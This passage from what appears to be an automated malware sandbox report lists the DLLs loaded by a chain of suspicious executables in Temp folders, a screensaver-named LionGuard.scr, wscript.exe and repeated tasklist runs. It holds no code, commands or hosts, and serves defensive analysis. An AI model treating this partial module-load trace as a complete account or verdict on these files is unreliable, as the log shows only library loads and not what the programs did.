Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Section loaded: version.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: mlang.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: winmm.dll
